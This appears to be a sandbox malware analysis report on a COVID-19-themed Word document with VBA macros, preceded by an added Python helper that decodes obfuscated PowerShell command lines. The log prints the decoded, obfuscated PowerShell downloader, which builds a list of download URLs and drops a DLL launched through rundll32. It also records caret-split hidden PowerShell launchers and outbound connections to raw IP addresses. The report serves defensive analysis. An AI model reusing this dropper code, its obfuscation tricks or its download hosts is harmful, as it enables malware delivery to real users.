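The command-line evidence in this report (a 5,000+ character cmd.exe line, the caret-split "P^Ow^er^she^L^L" that the PowerShell_Case_Anomaly Yara rule later catches in memory as "POwersheLL", the "-w hidden" switch and the abbreviated "-ENCOD" in place of -EncodedCommand) is what an analyst has to normalise before the payload can be read. The following is an added example, not Joe Sandbox code, that does that normalisation: it removes cmd.exe caret escapes, flags the mixed-case "powershell" token the way the Yara rule does, accepts any prefix of -EncodedCommand that powershell.exe itself accepts, and decodes the UTF-16LE base64 payload. The encoded blob is constructed from a harmless stand-in script, since the real payload is not reproduced on this page; the domain in it is example.invalid.

```python
"""Added example, not Joe Sandbox code: normalise and decode the launcher command line.
The -ENCOD blob below is CONSTRUCTED from SAMPLE_SCRIPT; the report's real one is not here."""
import base64
import re

# Constructed stand-in for the encoded script (harmless; example.invalid never resolves).
SAMPLE_SCRIPT = "$u='https://example.invalid/c/bcL6/';$p=\"$env:USERPROFILE\\Wdduy2m\\Tmc1kuo\\J70H.dll\""


def encode_command(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed launcher mirroring the shape of the report's cmd.exe command line.
SAMPLE_CMDLINE = (
    "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. "
    "& P^Ow^er^she^L^L -w hidden -ENCOD " + encode_command(SAMPLE_SCRIPT)
)


def strip_cmd_carets(cmdline: str) -> str:
    """cmd.exe treats ^ as an escape: '^x' yields 'x' and '^^' yields '^'.
    Removing them reconstructs what the child process actually received."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def powershell_case_anomaly(cmdline: str) -> bool:
    """Same idea as the PowerShell_Case_Anomaly Yara rule: the word 'powershell'
    in a casing no installer or human produces (e.g. POwersheLL)."""
    normal = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}
    return any(tok not in normal for tok in re.findall(r"(?i)powershell", cmdline))


# "-e", "-enc", "-ENCOD", "-EncodedCommand": powershell.exe accepts any unambiguous prefix.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    for flag, blob in _ENC_FLAG.findall(strip_cmd_carets(cmdline)):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ExecutionPolicy
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def triage(cmdline: str) -> dict:
    """Summary an analyst wants from one suspicious command line."""
    cleaned = strip_cmd_carets(cmdline)
    decoded = decode_encoded_command(cmdline)
    return {
        "length": len(cmdline),  # the sandbox flagged sizes of 5421 and 5517
        "carets_removed": cmdline.count("^") - cleaned.count("^"),
        "case_anomaly": powershell_case_anomaly(cleaned),
        "hidden_window": bool(re.search(r"(?i)\s-w(?:indowstyle)?\s+hidden\b", cleaned)),
        "decoded": decoded,
        "urls": re.findall(r"https?://[^\s'\"]+", decoded or ""),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

Run the decoder over the cleaned line, not the raw one: a caret placed inside the switch name ("-EN^COD") or inside the base64 blob is enough to make a naive regex miss the payload while powershell.exe still executes it.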
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write (reported four times)
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write (reported four times)
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Qafsungwqhhv\
Source: C:\Windows\SysWOW64\rundll32.exe | File deleted: C:\Windows\SysWOW64\Aanys\cokk.vuq
Source: C:\Windows\SysWOW64\rundll32.exe | Code function (77 addresses, all prefixed 7_2_):
  10019036, 1001307D, 10016A8F, 100018B2, 100082BB, 10008B58, 1000B161, 1001D96D, 1001B184, 1001BFAF,
  10019FCB, 100095D0, 1000C201, 1001440A, 1000740C, 10009211, 1001D613, 1000E813, 1000B82E, 1000CE33,
  1001A23E, 10015449, 1001264A, 1001364E, 10002055, 1001665D, 10005C61, 10005477, 1001467C, 10001E84,
  10019496, 1000169C, 100108A9, 100084B3, 10018CB5, 100122BB, 1001A4BD, 10014EC0, 10007EC4, 1000D0C9,
  1000E6D4, 100052D9, 1000C4D9, 10002CE2, 1000D6E6, 100068E6, 10012EE8, 1001BAED, 1001DAEC, 100038F1,
  10006EF4, 10016318, 10019724, 1000B32E, 10004137, 1000673B, 1001AB3D, 10005F4C, 10010550, 10003D60,
  10015B6D, 10005778, 1000D385, 10018989, 10014988, 1000ED98, 1000319D, 1001CB9F, 1001B9C0, 100099C3,
  10009FCC, 1000FFD4, 1000F9D8, 1000F5DC, 100161E6, 10010FEF, 1000E1F1
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Ut2r21ym17z8, Function Document_open
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE indicator, VBA macros: true
Source: 00000005.00000002.2107242892.0000000000216000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2107409443.0000000001BA6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.evad.winDOC@16/7@3/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$60273928I_COVID-19_SARS-CoV-2.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD087.tmpJump to behavior
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE indicator, Word Document stream: true
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE document summary: title field not present or empty
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: AG60273928I_COVID-19_SARS-CoV-2.doc | Virustotal: Detection: 26%
Source: AG60273928I_COVID-19_SARS-CoV-2.doc | ReversingLabs: Detection: 22%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdbg source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbc source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2120130538.000000001B900000.00000002.00000001.sdmp
Source: AG60273928I_COVID-19_SARS-CoV-2.doc | Initial sample: OLE summary subject = Licensed Borders Strategist Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: AG60273928I_COVID-19_SARS-CoV-2.doc | Stream path 'Macros/VBA/Wnoyuuu28ekk6591v' : High number of GOTO operations
Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module Wnoyuuu28ekk6591v
Document contains an embedded VBA with many randomly named variables
Source: AG60273928I_COVID-19_SARS-CoV-2.doc | Stream path 'Macros/VBA/Wnoyuuu28ekk6591v' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [base64-encoded PowerShell command omitted]
PowerShell case anomaly found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64-encoded PowerShell command omitted]
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: J70H.dll.5.dr | Static PE information: real checksum: 0x60901 should be: 0x5b1fb
Source: J70H.dll.5.dr | Static PE information: section name: .text4
Source: J70H.dll.5.dr | Static PE information: section name: .text5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10001698 push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10001113 push esp; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0018E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_0017388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00173A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00173272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00174BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001723D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0018E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0017388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00173A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00173272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00174BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001723D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_001823D7 push cs; iretd

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll
Source: C:\Windows\SysWOW64\rundll32.exe | PE file moved: C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Aanys\cokk.vuq:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (56 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (56 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2584Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.49.88.46 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 71.72.196.159 80
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded $0e2tk=[tyPe]("{2}{1}{0}{3}{4}"-f'I','m.','SystE','o.Di','reCTory'); set-itEM vAriabLE:wd8 ( [TyPe]("{1}{2}{0}{3}{4}" -f'VIcEPOiNtMana','SySt','eM.NEt.seR','g','Er')) ;$ErrorActionPreference = (('Sile'+'n')+('tlyCo'+'n')+'t'+('in'+'ue'));$N3176cr=$Q25U + [char](64) + $V96R;$C_1Q=('M9'+'5I'); ( VarIABLe 0E2tK ).vaLUE::"crEATeD`IReC`TORY"($HOME + ((('BJlWd'+'d')+('uy2'+'mB')+'J'+('lTmc'+'1')+('k'+'uo')+'BJ'+'l')."RE`p`LacE"(('B'+'Jl'),'\')));$N73P=('K'+('0'+'3V')); $WD8::"s`E`cURitYPrOToc`ol" = ('Tl'+('s'+'12'));$W_5K=(('T'+'88')+'J');$Iyqxv9_ = (('J7'+'0')+'H');$L12K=('Y0'+'3C');$Ojihnwg=$HOME+((('QLOWdd'+'u'+'y2')+'m'+('QL'+'O')+'Tm'+('c'+'1ku')+('oQL'+'O'))."R`ePla`ce"(([char]81+[char]76+[char]79),'\'))+$Iyqxv9_+(('.'+'dl')+'l');$A09L=('X'+('68'+'K'));$X4_1q8q=('w]'+'xm'+('[v'+'s://'+'shul')+'o'+('v'+'baa'+'zar.com')+'/'+'c'+('/'+'bcL6/')+('@'+'w]xm')+('[v'+'s')+':/'+('/m'+'yb')+('us'+'i')+('ness'+'e'+'ven')+('t'+'.com')+('/ti'+'ki')+('-'+'in')+('sta'+'l'+'l'+'/e/@')+('w]xm'+'[v'+':')+('//u'+'hk'+'.cn')+('cr'+'anes')+'.c'+('o'+'m/')+('E'+'rr')+'o'+('r'+'Pages')+'/3'+'/'+'@'+('w]xm'+'[vs')+':/'+'/'+'ca'+'p'+('tur'+'e'+'theac')+'ti'+'o'+'n'+'.'+('com.'+'au')+('/'+'wp-'+'inc')+'lu'+'d'+('es'+'/Y')+'jp'+('/@'+'w]'+'xm[vs:'+'//th')+'en'+('e'+'tw'+'ork'+'er.c')+('a'+'/c')+'om'+'me'+'nt'+'/'+'8'+'N4'+'/'+'@'+'w'+(']xm'+'[v')+('s:'+'/')+('/'+'tr')+('a'+'yonlin')+'e'+'g'+'h.'+('co'+'m/'+'cgi-bi')+('n'+'/HBP'+'R/@')+'w]'+'xm'+('[v'+'://mmo'+'.')+('m'+'ar')+'ti'+('npollo'+'
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $0e2tk=[tyPe]("{2}{1}{0}{3}{4}"-f'I','m.','SystE','o.Di','reCTory'); set-itEM vAriabLE:wd8 ( [TyPe]("{1}{2}{0}{3}{4}" -f'VIcEPOiNtMana','SySt','eM.NEt.seR','g','Er')) ;$ErrorActionPreference = (('Sile'+'n')+('tlyCo'+'n')+'t'+('in'+'ue'));$N3176cr=$Q25U + [char](64) + $V96R;$C_1Q=('M9'+'5I'); ( VarIABLe 0E2tK ).vaLUE::"crEATeD`IReC`TORY"($HOME + ((('BJlWd'+'d')+('uy2'+'mB')+'J'+('lTmc'+'1')+('k'+'uo')+'BJ'+'l')."RE`p`LacE"(('B'+'Jl'),'\')));$N73P=('K'+('0'+'3V')); $WD8::"s`E`cURitYPrOToc`ol" = ('Tl'+('s'+'12'));$W_5K=(('T'+'88')+'J');$Iyqxv9_ = (('J7'+'0')+'H');$L12K=('Y0'+'3C');$Ojihnwg=$HOME+((('QLOWdd'+'u'+'y2')+'m'+('QL'+'O')+'Tm'+('c'+'1ku')+('oQL'+'O'))."R`ePla`ce"(([char]81+[char]76+[char]79),'\'))+$Iyqxv9_+(('.'+'dl')+'l');$A09L=('X'+('68'+'K'));$X4_1q8q=('w]'+'xm'+('[v'+'s://'+'shul')+'o'+('v'+'baa'+'zar.com')+'/'+'c'+('/'+'bcL6/')+('@'+'w]xm')+('[v'+'s')+':/'+('/m'+'yb')+('us'+'i')+('ness'+'e'+'ven')+('t'+'.com')+('/ti'+'ki')+('-'+'in')+('sta'+'l'+'l'+'/e/@')+('w]xm'+'[v'+':')+('//u'+'hk'+'.cn')+('cr'+'anes')+'.c'+('o'+'m/')+('E'+'rr')+'o'+('r'+'Pages')+'/3'+'/'+'@'+('w]xm'+'[vs')+':/'+'/'+'ca'+'p'+('tur'+'e'+'theac')+'ti'+'o'+'n'+'.'+('com.'+'au')+('/'+'wp-'+'inc')+'lu'+'d'+('es'+'/Y')+'jp'+('/@'+'w]'+'xm[vs:'+'//th')+'en'+('e'+'tw'+'ork'+'er.c')+('a'+'/c')+'om'+'me'+'nt'+'/'+'8'+'N4'+'/'+'@'+'w'+(']xm'+'[v')+('s:'+'/')+('/'+'tr')+('a'+'yonlin')+'e'+'g'+'h.'+('co'+'m/'+'cgi-bi')+('n'+'/HBP'+'R/@')+'w]'+'xm'+('[v'+'://mmo'+'.')+('m'+'ar')+'ti'+('npollo'+'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 111 | Masquerading 21 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter 211 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
